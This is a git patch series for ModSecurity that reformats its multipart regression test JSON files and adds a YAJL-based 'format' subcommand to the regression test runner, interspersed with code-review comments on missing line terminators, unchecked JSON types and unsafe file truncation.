+ " name=\"b\"\n",
+ "\n",
+ "2\n",
+ "-------------------------------69343412719991675451336310646--\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"ARGS:a"
+ },
+ "rules":[
+ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
+ "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
+ "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"",
+ "SecRule ARGS \"@eq 1\" \"phase:2,deny,status:403,id:5000277\""
+ ]
+ }
+]
+
diff --git a/test/test-cases/regression/variable-MULTIPART_NAME.json b/test/test-cases/regression/variable-MULTIPART_NAME.json
index 63e5f629e1..4262582379 100644
--- a/test/test-cases/regression/variable-MULTIPART_NAME.json
+++ b/test/test-cases/regression/variable-MULTIPART_NAME.json
@@ -1,121 +1,121 @@
-[
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: MULTIPART_FILENAME",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is another very small test file..\n",
- "----------------------------756b6d74fa1a8ee2--\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: MULTIPART_FILENAME",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n",
- "Content-Type: text/plain\r\n",
- "\r\n",
- "This is another very small test file..\r\n",
- "----------------------------756b6d74fa1a8ee2--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- }
-]
-
+[
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: MULTIPART_FILENAME",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: MULTIPART_FILENAME",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "This is another very small test file..\r\n",
+ "----------------------------756b6d74fa1a8ee2--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ }
+]
+
diff --git a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
index 12700963db..cef1f56801 100644
--- a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
+++ b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json
@@ -1,218 +1,218 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (all headers)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm1\n", - "Content-Type: image/jpeg\n", - "\n", - "1\n", - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm2\n", - "\n", - "2\n", - "-------------------------------69343412719991675451336310646--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "http_code": 403, - "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm1\n", - "Content-Type: image/jpeg\n", - "\n", - "1\n", - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm2\n", - "\n", - "2\n", - "-------------------------------69343412719991675451336310646--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "http_code": 403, - "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS:parm1 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm1", - "Content-Type: image/jpeg", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm2", - "", - "2", - "-------------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS:parm2 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (check EOL)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"249", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=\"file\"; filename=\"New Text Document.txt\"", - "Content-Type: text/plain; charset=utf-8\r\n", - "", - "1", - "-------------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." 
- ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS \"@rx ^content-type\\s*+:\\s*+(.*)$\" \"id:922110,phase:2,deny,capture,t:none,t:lowercase,chain\"", - "SecRule TX:1 \"!@rx ^text/plain; charset=(?:iso-8859-15?|windows-1252|utf-8)$\" \"t:lowercase\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (all headers)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." 
+ ] + }, + "expected":{ + "http_code": 403, + "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - match)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." 
+ ] + }, + "expected":{ + "http_code": 403, + "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS:parm1 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - no match)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=parm1", + "Content-Type: image/jpeg", + "", + "1", + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=parm2", + "", + "2", + "-------------------------------69343412719991675451336310646--" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." 
+ ] + }, + "expected":{ + "http_code": 200 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS:parm2 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (check EOL)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"249", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=\"file\"; filename=\"New Text Document.txt\"", + "Content-Type: text/plain; charset=utf-8\r\n", + "", + "1", + "-------------------------------69343412719991675451336310646--" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 200 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS \"@rx ^content-type\\s*+:\\s*+(.*)$\" \"id:922110,phase:2,deny,capture,t:none,t:lowercase,chain\"", + "SecRule TX:1 \"!@rx ^text/plain; charset=(?:iso-8859-15?|windows-1252|utf-8)$\" \"t:lowercase\"" + ] + } +] + From b1c59b72504c23e51b95c84238c11e21f22b394a Mon Sep 17 00:00:00 2001 
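Review bot: The request bodies of the "specific header - no match" and "check EOL" cases are still written without line terminators on the new side (the "check EOL" case has one only on its `Content-Type` line). Since the first patch of this series stops the runner from appending a newline to each body element, these bodies are now sent as one unbroken run of text and probably no longer parse as multipart. Both cases expect only `"http_code": 200`, which a request with no parsed parts would presumably also produce, so they may pass without exercising MULTIPART_PART_HEADERS at all. Each body element should end in an explicit terminator, as the first two cases in this file do, and the declared `Content-Length` should be rechecked against the resulting body.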
From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 00:40:39 +0900 Subject: [PATCH 04/29] Add format subcommand to regression_test --- test/common/modsecurity_test.cc | 29 ++-- test/common/modsecurity_test.h | 4 +- test/regression/regression.cc | 27 ++++ test/regression/regression_test.cc | 235 +++++++++++++++++++++++++++++ test/regression/regression_test.h | 13 ++ 5 files changed, 298 insertions(+), 10 deletions(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 21af285d55..73406cdd89 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -68,18 +68,25 @@ bool ModSecurityTest::load_test_json(const std::string &file) { return false; } - size_t num_tests = node->u.array.len; - for ( int i = 0; i < num_tests; i++ ) { - yajl_val obj = node->u.array.values[i]; - - auto u = std::unique_ptr(T::from_yajl_node(obj)); + if (m_format) { + auto u = std::unique_ptr(T::from_yajl_node(node)); u->filename = file; - const auto key = u->filename + ":" + u->name; - (*this)[key].push_back(std::move(u)); - } + (*this)[file].push_back(std::move(u)); + } else { + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; - yajl_tree_free(node); + auto u = std::unique_ptr(T::from_yajl_node(obj)); + u->filename = file; + + const auto key = u->filename + ":" + u->name; + (*this)[key].push_back(std::move(u)); + } + + yajl_tree_free(node); + } return true; } @@ -140,6 +147,10 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_test_multithreaded = true; } + if (argc > i && strcmp(argv[i], "format") == 0) { + i++; + m_format = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index e7a8b1b3e5..58faa13e95 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h 
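Review bot: Neither branch of the new `if (m_format)` verifies that the parsed top-level value is an array before `node->u.array` is read. The else branch reads `node->u.array.len` directly, and the format branch hands `node` to `T::from_yajl_node`, which for `RegressionTests` reads the same field before `toJSON()` reaches its own `YAJL_IS_ARRAY` test. Unless a check sits above this hunk (load_test_json starts outside it), a file whose top level is an object is read through the wrong union member. A guard ahead of the branch covers both paths: `if (!YAJL_IS_ARRAY(node)) { yajl_tree_free(node); return false; }`.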
@@ -35,7 +35,8 @@ template class ModSecurityTest : : m_test_number(0), m_automake_output(false), m_count_all(false), - m_test_multithreaded(false) { } + m_test_multithreaded(false), + m_format{false} { } std::string header(); void cmd_options(int, char **); @@ -50,6 +51,7 @@ template class ModSecurityTest : bool m_automake_output; bool m_count_all; bool m_test_multithreaded; + bool m_format; }; } // namespace modsecurity_test diff --git a/test/regression/regression.cc b/test/regression/regression.cc index ba37f76dfb..8ffdac5d4a 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -41,6 +41,7 @@ using modsecurity_test::CustomDebugLog; using modsecurity_test::ModSecurityTest; using modsecurity_test::ModSecurityTestResults; using modsecurity_test::RegressionTest; +using modsecurity_test::RegressionTests; using modsecurity_test::RegressionTestResult; using modsecurity::Utils::regex_search; @@ -436,6 +437,32 @@ int main(int argc, char **argv) return 0; #else test.cmd_options(argc, argv); + + if (test.m_format) { +#ifdef WITH_YAJL + std::cout << "start formatting test case JSON files" << std::endl; + ModSecurityTest test; + test.cmd_options(argc, argv); + test.load_tests(); + for (const auto &[name, tests] : test) { + std::ofstream ofs{name}; + if (!ofs.is_open()) { + std::cerr << "cannot open " << name << " for writing." << std::endl; + return 1; + } + ofs << tests[0]->toJSON(); + ofs.close(); + std::cout << "written formatted JSON to " << name << std::endl; + } + std::cout << "finished formatting files." << std::endl; + return 0; +#else + std::cout << "Test utility cannot format test case JSON files without being built with YAJL." \ + << std::endl; + return 1; +#endif + } + if (!test.m_automake_output && !test.m_count_all) { std::cout << test.header(); } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 8df1d1c035..1d9f1b8ac8 100644 --- a/test/regression/regression_test.cc 
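Review bot: In the format branch of main, `std::ofstream ofs{name}` truncates the test file before `toJSON()` has produced anything, and `toJSON()` in this patch can return an empty string or call `exit(1)` on a schema error, which leaves the original file emptied. Rendering the JSON into a string first and opening the file only once it is known to be non-empty keeps a failed run from destroying its input; writing to a temporary file and renaming it over the original would be safer still. The branch also declares a second `test` that shadows the outer one and parses the options again, which deserves a distinct name. main's body starts outside the hunk.

```cpp
for (const auto &[name, tests] : test) {
    // Render first: the input file must not be truncated if generation fails.
    const std::string json = tests[0]->toJSON();
    if (json.empty()) {
        std::cerr << "cannot format " << name << "." << std::endl;
        return 1;
    }
    std::ofstream ofs{name};
    // … unchanged: is_open check and error return …
    ofs << json;
    // … unchanged: close and progress message …
}
```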
+++ b/test/regression/regression_test.cc @@ -21,6 +21,10 @@ #include #include +#ifdef WITH_YAJL +#include +#endif + namespace modsecurity_test { std::string RegressionTest::print() { 
@@ -218,4 +222,235 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { + RegressionTests *u = new RegressionTests(node); + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; + u->tests.emplace_back(*RegressionTest::from_yajl_node(obj)); + } + return u; +} + +RegressionTests::~RegressionTests() { +#ifdef WITH_YAJL + yajl_tree_free(node); +#endif +} + +#ifdef WITH_YAJL + +static yajl_gen_status jayl_gen_string_view(yajl_gen g, std::string_view s) { + return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); +} + +static yajl_gen_status jayl_gen_key_val(yajl_gen g, std::string_view key, std::string_view val) { + auto s = jayl_gen_string_view(g, key); + if (s != yajl_gen_status_ok) { + return s; + } + return jayl_gen_string_view(g, val); +} + +static yajl_gen_status copy_number(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_NUMBER(val)) { + std::cerr << "error: " << key << " must be number.\n"; + exit(1); + } + auto s = jayl_gen_string_view(g, key); + if (s != yajl_gen_status_ok) { + return s; + } + return yajl_gen_number(g, + reinterpret_cast(val->u.number.r), + strlen(val->u.number.r)); +} + +static yajl_gen_status copy_string(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_STRING(val)) { + std::cerr << "error: " << key << " must be string.\n"; + exit(1); + } + return jayl_gen_key_val(g, key, val->u.string); +} + +static void ensure_obj(std::string_view key, yajl_val obj) { + if (!YAJL_IS_OBJECT(obj)) { + std::cerr << "error: " << key << " must be object.\n"; + exit(1); + } +} + +static void copy_str_map(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_OBJECT(val)) { + std::cerr << "error: " << key << " must be object.\n"; + exit(1); + } + jayl_gen_string_view(g, key); + yajl_gen_map_open(g); + for (size_t i = 0; i < 
val->u.object.len; ++i) { + const char *key2 = val->u.object.keys[i]; + yajl_val val2 = val->u.object.values[i]; + copy_string(g, key2, val2); + } + yajl_gen_map_close(g); +} + +static void copy_str_array(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_ARRAY(val)) { + std::cerr << "error: " << key << " must be array.\n"; + exit(1); + } + jayl_gen_string_view(g, key); + yajl_gen_array_open(g); + for (size_t i = 0; i < val->u.array.len; ++i) { + yajl_val val2 = val->u.array.values[i]; + if (!YAJL_IS_STRING(val2)) { + std::cerr << "error: array element of " << key << " must be string.\n"; + exit(1); + } + jayl_gen_string_view(g, val2->u.string); + } + yajl_gen_array_close(g); +} + +static void copy_body(yajl_gen g, std::string_view key, yajl_val val) { + if (YAJL_IS_STRING(val)) { + jayl_gen_key_val(g, key, val->u.string); + } else { + copy_str_array(g, key, val); + } +} + +std::string RegressionTests::toJSON() { + const unsigned char *buf; + size_t len; + yajl_gen g; + + g = yajl_gen_alloc(NULL); + if (g == NULL) { + return ""; + } + yajl_gen_config(g, yajl_gen_beautify, 1); + + if (!YAJL_IS_ARRAY(node)) { + std::cerr << "error: toplevel must be array.\n"; + exit(1); + } + + yajl_gen_array_open(g); + for (size_t i = 0; i < node->u.array.len; ++i) { + yajl_val test_obj = node->u.array.values[i]; + ensure_obj("test", test_obj); + yajl_gen_map_open(g); + for (size_t j = 0; j < test_obj->u.object.len; ++j) { + const char *key = test_obj->u.object.keys[j]; + yajl_val val = test_obj->u.object.values[j]; + if (strcmp(key, "enabled") == 0 + || strcmp(key, "version_min") == 0 + || strcmp(key, "version_max") == 0 + || strcmp(key, "github_issue") == 0) { + copy_number(g, key, val); + } else if (strcmp(key, "title") == 0 + || strcmp(key, "url") == 0 + || strcmp(key, "resource") == 0) { + copy_string(g, key, val); + } else if (strcmp(key, "client") == 0) { + ensure_obj("client", val); + jayl_gen_string_view(g, "client"); + yajl_gen_map_open(g); + for (size_t k = 
0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "ip") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "port") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "server") == 0) { + ensure_obj("server", val); + jayl_gen_string_view(g, "server"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "ip") == 0 + || strcmp(key2, "hostname") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "port") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "request") == 0) { + ensure_obj("request", val); + jayl_gen_string_view(g, "request"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "url") == 0 + || strcmp(key2, "method") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "http_version") == 0) { + copy_number(g, key2, val2); + } else if (strcmp(key2, "headers") == 0) { + copy_str_map(g, key2, val2); + } else if (strcmp(key2, "body") == 0) { + copy_body(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "response") == 0) { + ensure_obj("response", val); + jayl_gen_string_view(g, "response"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "protocol") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "headers") == 0) { + copy_str_map(g, key2, val2); + 